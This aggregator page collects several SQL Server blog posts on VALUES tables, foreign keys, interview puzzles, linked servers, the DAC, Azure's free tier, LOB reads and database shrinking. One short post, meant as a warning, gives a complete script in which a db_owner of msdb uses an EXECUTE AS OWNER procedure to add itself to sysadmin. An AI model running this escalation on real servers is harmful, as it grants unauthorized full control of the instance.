Loading...

Follow SQL Studies on Feedspot

Continue with Google
Continue with Facebook
or

Valid

This has come up a few times recently, I find it rather fascinating and I can never seem to remember how to do it properly .. so in other words, it’s a perfect subject for a blog post.

Basically, you can use VALUES to create a table within a query. I’ve seen it done in a number of places. Mostly when demoing something and you want some data, but don’t want to actually create a table. I’ve also seen it used to create a numbers table, create test data, etc. Really, any case where you want a short list of values but don’t want to create an actual (or even temp) table to store them. Something like this:

SELECT Nums.[Values]
FROM (VALUES (1),(2),(3),(4),(5)) Nums([Values]);

You can also, of course, use it to create a multi-column table.

SELECT Data.FName, Data.LName, Data.BDate
FROM (VALUES ('Bob','Smith','1/1/2000'),
			('Jane','Doe','10/4/2000'),
			('Dr','Who',NULL)) Data(FName, LName, BDate);

Now, here’s where this gets interesting. That table makes some assumptions. Just because I called the 3rd column a date doesn’t mean it is one. In fact, it’s a varchar like the other two columns. That’s kind of important if you decide to do anything to that column. If possible you’ll get an implicit conversion, and sometimes you’ll just get an error.

SELECT Data.FName, Data.LName, Data.BDate+1
FROM (VALUES ('Bob','Smith','1/1/2000'),
			('Jane','Doe','10/4/2000'),
			('Dr','Who',NULL)) Data(FName, LName, BDate);

Msg 245, Level 16, State 1, Line 4
Conversion failed when converting the varchar value ‘1/1/2000’ to data type int.

To fix that you’ll want to do make sure that SQL knows what the datatype is actually supposed to be. There may be other ways to do this but I’ve found if you do an explicit conversion on the column in the first row that it will fix the datatype for the entire table.

SELECT Data.FName, Data.LName, Data.BDate+1
FROM (VALUES ('Bob','Smith',CAST('1/1/2000' AS DateTime)),
			('Jane','Doe','10/4/2000'),
			('Dr','Who',NULL)) Data(FName, LName, BDate);

These types of things can get particularly interesting if you start combining them together.

SELECT First.Name, Last.Name
FROM (VALUES ('Bob'), ('Jane'), ('Dr')) First(Name)
CROSS JOIN (VALUES ('Smith'), ('Doe'), ('Who')) Last(Name);

Don’t forget that at the end of the list of values you have to give your table along with each of the columns in it a name so you have something to call it throughout the rest of the query.

(VALUES ('col1','col2'), -- Row1
	('col1','col2'), -- Row2
	('col1','col2'), -- Row3 etc
	) TableName(Column1Name, Column2Name)
Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

When I decided to rip off of Brent Ozar’s (b/t) Bad Idea Jeans series (yes I asked) I decided that since I live in Texas it would be a cowboy hat (now I need to go buy one I guess). So, putting on my imaginary cowboy hat here is one of the strangest things I’ve seen or come up with in years.

I have to admit, this one wasn’t my idea. But the other day I saw a pair of tables, with identical data with a foreign key between them. Which seemed a little weird. Why two identical tables? Why a foreign key between them?

It got weirder. The tables were of the format (id, description, value). The foreign key was on those last two columns. Normally you use a foreign key to maintain referential integrity. Make sure that the values in ColumnA exist in TableB. In this case though, since they are including the value column it has a strange (side?) effect. You can’t update those columns.

Quick demo because I find they explain things far better than I ever can.

-- Setup code

USE Test;
GO

CREATE TABLE Table1 (
	ID INT NOT NULL IDENTITY(1,1)
	, Descrip varchar(50)
	, Val varchar(50)
	, CONSTRAINT pk_Table1 PRIMARY KEY (Descrip, Val)
	);

CREATE TABLE Table2 (
	ID INT NOT NULL IDENTITY(1,1)
	, Descrip varchar(50)
	, Val varchar(50)
	, CONSTRAINT pk_Table2 PRIMARY KEY (Descrip, Val)
	, CONSTRAINT fk_Table2_Table1 FOREIGN KEY (Descrip, Val)
		REFERENCES Table1 (Descrip, Val)
	);

INSERT INTO Table1 VALUES 
	('Property1','Value1')
	,('Property2', 'Value2')
	,('Property3', 'Value3')
	,('Property4', 'Value4')
	,('Property5', 'Value5');

INSERT INTO Table2 VALUES
	('Property1','Value1')
	,('Property2', 'Value2')
	,('Property3', 'Value3')
	,('Property4', 'Value4')
	,('Property5', 'Value5');

So obviously inserts work (as long as you do them in the right order), but how about updates?

UPDATE Table1 SET Val = 'NewValue'
	WHERE Descrip = 'Property1';

UPDATE Table2 SET Val = 'NewValue'
	WHERE Descrip = 'Property1';

Msg 547, Level 16, State 0, Line 39
The UPDATE statement conflicted with the REFERENCE constraint “fk_Table2_Table1”. The conflict occurred in database “Test”, table “dbo.Table2”.
The statement has been terminated.
Msg 547, Level 16, State 0, Line 42
The UPDATE statement conflicted with the FOREIGN KEY constraint “fk_Table2_Table1”. The conflict occurred in database “Test”, table “dbo.Table1”.
The statement has been terminated.

I’ll be honest, I have no idea why you would do this. At this point, the only way to update the data is to remove the foreign key, update, and add it back again. Or wipe out the rows (in the right table order of course) and add them back again.

If you really don’t want people to update a table don’t grant the permissions. Or if you are really desperate:

DENY UPDATE ON Table1 TO MyUser;

Note: If you want to hit everyone you can always do the DENY on the public role. Well, everyone but dbo and members of sysadmin.

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

This year PASS is trying something new at PASS Summit. There are going to be Learning Pathways. A learning pathway is at least three sessions on a single subject that will get you started on a new (or update an old) skill. And I’ll be taking part in the Security Learning Pathway!

First let me say wish me luck. I’ve spoken a number of times before (don’t ask me what number, I haven’t kept track but it’s probably in the high single or low double digits) but each and every time I feel like I can use all the luck I can get.

This is my second time speaking at the Summit. Last time was in 2015 and I have to tell you, it was pretty cool. I’ve always felt like getting to speak is like getting to sit at the big kid’s table. Speaking at Summit is 10x that. I mean there are always some pretty amazing speakers there.

I’ll be giving my SQL Server Security from the Ground Up session. It’s a pretty good one if I do say so myself. I make no assumptions about your security knowledge and get you to where you can at least handle the basics of securing a SQL Server. After my session, there are 3 more.

  1. How I Would Attack SQL Server
  2. Capturing SQL Server Activity with SQL Server Audit
  3. Six Ways to Improve SQL Server Application Security

 
As you can see, these sessions, along with mine, make a great progression from minimal security knowledge to a pretty solid start at protecting a SQL Server instance.

Some of the other pathways include Cloud Migration, Technical Leadership, Modernizing with SQL 2019, Linux for SQL Server Professionals etc etc. I have to admit there are several of these that I’m really excited about trying out. Can’t wait to see y’all there!

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

It’s TSQL Tuesday and Matthew McGiffen (b/t) is our host with a subject near and dear to my heart. Puzzles! Thanks for coming up with this great subject Matt!

As Matt mentioned puzzles are something I do anyway. In fact, I have a whole page of puzzles and other fun things to do. Since I had done so many crosswords and other types of things, I decided this time I would do a more traditional SQL puzzle. As I thought about what to write, I remembered a couple of puzzles I had been given during some interviews. Now, SQL has improved quite a bit from when I was given these so we are going to have to have a few rules.

Pagination

The year is 2004. You’re taking a tech test as an interview for a SQL development job. They have a page in their application that displays up to 20 rows of information. They need a piece of code that will return the rows from a given page. Oh, and it may not always be 20 rows per page. You need to write a piece of code where they can pass in a page number and page size and get back results. So for example, if the page size is 20 and the page is 3 then you need to return back rows 41 to 60.

Requirements

  • Return a page of information from spt_values.
  • Order is by the column name.
  • There must be a variable or parameter for page number and one for page size.
  • No windowing functions. No OFFSET/FETCH, no ROWNUMBER(). This is 2004 they don’t exist yet.
  • The last page is of couse, just however many rows are left. So in the example above if there are only 55 rows total, the 3rd page returns 15 rows.
Dates and times to numbers and back

It’s a few years later and you are looking for a job again. This time you are given an actual request from a client. It’s one they’ve already solved but they want to see how you would do it. A piece of it (and one of the harder bits at that) is the fact that they are storing their datetime data as two integers. So the datetime ‘5/14/2019 8:00AM’ would be two integers. 20190514 and 80000. And ’12/4/2019 00:00:02AM’ would be 20191204 and 2.

Requirements

Given the table below, combine the two integers back into a datetime value.

CREATE TABLE DateTime_Ints (int_date int, int_time int);
INSERT INTO DateTime_Ints
SELECT CONVERT(int, CONVERT(varchar,MyDate,112)),
		CONVERT(int, REPLACE(CONVERT(varchar,MyDate,8),':',''))
FROM (VALUES (CAST('1/1/1960 12:00:00' AS DATETIME)), ('12/5/1981 00:00:04'),
			('5/30/1963 22:14:30'), ('8/17/2001 00:20:10'),
			('10/31/2008 9:00:00'), ('11/2/2019 04:00:13'),
			('2/25/1983 00:09:04'), ('1/21/2000 19:30:00'),
			('4/12/2010 10:10:10'), ('4/4/2004 04:04:04')
	) AS DateList(MyDate);

Remember that this is pre 2008 so no DATE or TIME datatypes.

And if these are too easy, or you are just having fun, pick one of the newer commands (STRING_AGG is a really popular one for this) and figure out how the same task was done before that command became available.
Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

If you have to deal with linked servers then you probably have or will run into the following error:

Login failed for user ‘NT AUTHORITY\ANONYMOUS LOGON’

But I’m not trying to use the linked server. I’m trying to create/alter a stored procedure.

Yea, but when you do that, if a linked server is referenced in the code, the parser(?) is going to go out and check and see if the objects you are referencing exist. In fact, you can run into any number of different linked server errors, not just this one.

So what do I do?

Simply put whatever account you are using to do the create/alter has to be able to check across the linked server. Note: this could be any type of code, it doesn’t have to be a stored procedure, it could be a function or whatever. The solution is going to depend somewhat on what position you are in.

  • Kerberos is working, but you don’t have access to the linked server.
    Get access either through your account or possibly a SQL Server Id, or have someone who has access do the work. I have on occasion set up a new SQL Id on both sides of the linked server and the logged in as that to create/modify the SP. Then I remove those IDs. But then again, I’m a sysadmin with a lot of experience scripting creating SQL Ids.
  • Kerberos isn’t set up because you are using SQL Ids
    See above and please reconsider your life choices
  • Kerberos is set up but broken
    Fix Kerberos. This will take longer but if Kerberos isn’t working you aren’t going to be able to run the stored procedure anyway.
  • The linked server is broken for some reason other than Kerberos.
    Again, see above.
Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 
SQL Studies by Kenneth Fisher - 2w ago

This doesn’t require much in the way discussion. This isn’t exactly a huge issue since I don’t think granting db_owner in msdb happens a whole lot, but still. Consider yourself warned.

I should add, this will work on any database that has trustworthy turned on and the dbo is a sysadmin. Oh, and my understanding is that msdb needs both an owner that is sysadmin (sa) and be trustworthy.

CREATE LOGIN ImpersonationTest WITH PASSWORD ='test', CHECK_POLICY = OFF;
GO
USE msdb
GO
CREATE USER ImpersonationTest FROM LOGIN ImpersonationTest;
GO
ALTER ROLE db_owner ADD MEMBER ImpersonationTest;
GO

Connect as ImpersonationTest

USE msdb
GO
CREATE PROCEDURE dbo.sysadminMe 
WITH EXECUTE AS owner
AS
ALTER SERVER ROLE sysadmin ADD MEMBER ImpersonationTest;
GO
EXEC dbo.sysadminMe;
GO
SELECT * FROM sys.login_token;

Read Full Article
  • Show original
  • .
  • Share
  • .
  • Favorite
  • .
  • Email
  • .
  • Add Tags 

Yes, it’s that time again. Time to do your homework. This month your homework is to set up the DAC (dedicated admin connection) for remote access and practice with it using SQLCMD.

For those of you that don’t know the DAC is a single user connection that has a dedicated set of resources. What this means is that when your instance is sluggish or even unresponsive the DAC may very well be able to connect and you can run diagnostic queries and possibly even fix things. However, in order to do that you need practice!

  • Turn on remote DAC connections.
  • Learn why SSMS can be somewhat problematic when using the DAC.
  • Use SQLCMD to connect using the DAC.
  • Run a few diagnostic queries.
    • What’s trying to run right now?
    • What’s the memory usage on the instance?
    • What queries are using the most memory?
    • Same with CPU.
    • Anything else you can think of.
  • In another session check what session has the DAC open and who’s doing it. (You’d be surprised but I’ve seen people open the DAC for no particular reason.)
  •  
    I want to point out that this one is particularly important. You won’t use the DAC often but if you need it your instance probably has some pretty significant issues. Given that it’s a single connection you won’t be able to use a lot of the tools you are used to. For most of us, this is going to require practice. Possibly a lot of it. And you really don’t want to take time to practice while your users are screaming about an outage.

    Read Full Article
    • Show original
    • .
    • Share
    • .
    • Favorite
    • .
    • Email
    • .
    • Add Tags 

    The first thing I want to do is say thank you to Michael Crump (b/t). He tweeted out this:

    What do you get with a Free account in #Azure?

    -A LOT-

    750 Hours of #VMs
    250 GB of #SQL db
    5GB of @AzureCosmosDB
    1 million requests with @AzureFunctions
    5 users free w/ @AzureDevOps
    100 modules of ML
    more – https://t.co/MEFWqGbXg1https://t.co/Qj7MdIt4qW

    — Michael Crump (@mbcrump) April 10, 2019

    A while back I talked about getting started with Azure. At the time you got a year of $25 a month credit. This is no longer the case but that’s all to the better. I mean look at that list of benefits! Michael wasn’t kidding. It’s -A LOT-.

    For 1 month
    • $200 credit
    For 12 months
    • 750 hours each of Windows and Linux virtual machines.
    • Two 64gb managed disks.
    • 5gb blog storage.
    • 5gb file storage.
    • 250gb SQL Database.
    • 5gb Azure Cosmos DB.
    • 15gb bandwidth
    Always free
    • 10 Web, mobile, or API apps.
    • Functions: 1,000,000 requests per month.
    • Event Grid: 100,000 operations per month.
    • Azure Kubernetes Service: Free
    • Face API: 30,000 transactions per month.
    • DevTest Labs: Free
    • Active Directory B2C: 50,000 monthly stored users.
    • Service Fabric: Free
    • Azure DevOps: 5 users with unlimited private Git repos.
    • Wow this is a long list
    • If you want to read
    • the rest of it you
    • should follow this link
    • to create your free Azure account.
    • Oh, SQL Server Development edition is on the list too.
    • No idea why since it’s not an Azure product.
    • But hey, free!

    This gives you 12 months to really dig into Azure without having to spend much if anything. This is a huge, if temporary, boost to your home lab. Just the free VMs alone means you can create a cluster and start playing with availability groups. Or a single VM and practice installing SQL. Or create an Azure SQL DB. Or, well, really almost anything.

    Given how quickly things are changing I’d get started!

    Read Full Article
    • Show original
    • .
    • Share
    • .
    • Favorite
    • .
    • Email
    • .
    • Add Tags 

    I was asked the other day why a customer was having performance issues on a table. A simple SELECT that only returns 1134 rows was taking over a minute!

    I did some looking because that sounds really odd. I mean that’s a LOT of time for just over a thousand rows. Ok, so I check the server speed, drive speed, anything blocking, wait stats etc. All the usual suspects. No luck. Then I checked the table size:

    exec sp_spaceused [TableName];

    That’s an pretty big table for the number of rows. Particularly given that it’s all data and almost no index. Ok, let’s look at the time/io breakdown:

    SET STATISTICS TIME, IO OFF
    
    SELECT [Col1], [Col2], [Col3], [Col4], [Col5]
          ,[Col6], [Col7], [Col8], [Col9], [Col10]
      FROM [dbo].[TableName]
    GO

    SQL Server parse and compile time:
    CPU time = 0 ms, elapsed time = 0 ms.

    (1134 rows affected)
    Table ‘TableName’. Scan count 1, logical reads 182, physical reads 0, read-ahead reads 0, lob logical reads 53742, lob physical reads 18, lob read-ahead reads 27384.

    SQL Server Execution Times:
    CPU time = 172 ms, elapsed time = 69110 ms.

    Hmm, 182 logical reads. Not a whole lot. But wait, lob logical reads 53742, lob physical reads 18, lob read-ahead reads 27384. Or a total of 81144 reads. That’s a fair amount. In case you weren’t aware lob stands for large object. Lob objects are things like varchar(max), nvarchar(max), filestream, xml and varbinary. Not all of the data will be in an lob page. For example my understanding is if you use a varchar(max) to store 15 bytes it will still be stored in the normal data page. It’s only when it no longer fits it gets pushed to an lob page. Either way I looked over the data types for the table. There were some INTs, VARCHARs, a couple of DATETIMEs and an XML.

    An XML. Ok, let’s try this differently.

    SET STATISTICS TIME, IO OFF
    
    SELECT [Col1], [Col2], [Col3], [Col4], [Col5]
          ,[Col6], [Col7], [Col8], [Col9] /*, [Col10] */
      FROM [dbo].[TableName]
    GO

    SQL Server parse and compile time:
    CPU time = 0 ms, elapsed time = 0 ms.

    (1134 rows affected)
    Table ‘TableName’. Scan count 1, logical reads 181, physical reads 0, read-ahead reads 0, lob logical reads 0, lob physical reads 0, lob read-ahead reads 0.

    SQL Server Execution Times:
    CPU time = 0 ms, elapsed time = 129 ms.

    Well look at that. One less logical read, no lob reads and it took all of 129 ms. That’s 537 times faster.

    This prompted a quick conversation with the client.

    Me: Do you really need to pull that XML column every time you do the query?
    Client: Well we need to keep it. We need that data.
    Me: I get that. But when you do the query to pull all the rows do you need the XML for all of them at the same time? Or do you look at the basic info in a grid, scroll through it and then bring up a single detail page with the XML for just that single row.
    Client: Oh yea. That’s exactly what we do.

    So yes, not pulling a single column, that wasn’t needed most of the time, on a tiny, tiny table made a huge difference. Only pull the data you need people. * is a really bad habit, and even in this case where they were pulling the columns by name they still need to pay attention and only pull the columns they were actually going to use.

    Read Full Article
    • Show original
    • .
    • Share
    • .
    • Favorite
    • .
    • Email
    • .
    • Add Tags 

    Yes, I realize you shouldn’t shrink your database (data files or log files), but I recently had a case where it was completely appropriate to do a shrink. We had a table that was almost a terabyte on its own. It was decided to put in an archive process that got rid of 3/4 of the table. This left us with ~750gb of empty space. The total DB size was ~1.25tb so this was going to more than cut it in half.

    We needed that space for other things so it was time to shrink down the database. Now, you can work in the database while it’s being shrunk but it’s not something I would do on a busy production system. Shrink is also pretty slow. In this case, I expected it could take quite a bit of time. Maybe not days, but maybe 10-20 hours. Unfortunately, I don’t have that much time. This particular system has an outage window/slow time of a few hours a day. So what can I do?

    Well, there are a few thoughts/tips.

    • First of all I like to target my shrinks by using DBCC SHRINKFILE instead of DBCC SHRINKDATABASE. In this particular case, I only had one file (of 10) that needed to be shrunk. No point in hitting the entire database when a single file will do.
    • Both SHRINKDATABASE and SHRINKFILE have an option TRUNCATEONLY. It’s pretty quick (a few seconds to a minute usually) and doesn’t actually move any pages around. All it does go out to the very last page in use and get rid of all of the empty space after that. So for example in my case using TRUNCATEONLY almost immediately got rid of ~200gb. It didn’t fix things but it provided some much-needed space on the drive.
    • You can move tables from one filegroup to another. You could potentially move each table to a different filegroup and then truncate the file(s) in the original filegroup or even empty them out and get rid of the filegroup entirely.
    • This is a very important part of the BOL entry:

      You can stop DBCC SHRINKFILE operations at any point and any completed work is preserved.

      You can run the shrink for an hour or two a day and eventually it will finish! This is what I ended up doing. It took a bit over 2 weeks of running the shrink every day from 1-3 hours a day but it got there.

    Read Full Article

    Read for later

    Articles marked as Favorite are saved for later viewing.
    close
    • Show original
    • .
    • Share
    • .
    • Favorite
    • .
    • Email
    • .
    • Add Tags 

    Separate tags by commas
    To access this feature, please upgrade your account.
    Start your free month
    Free Preview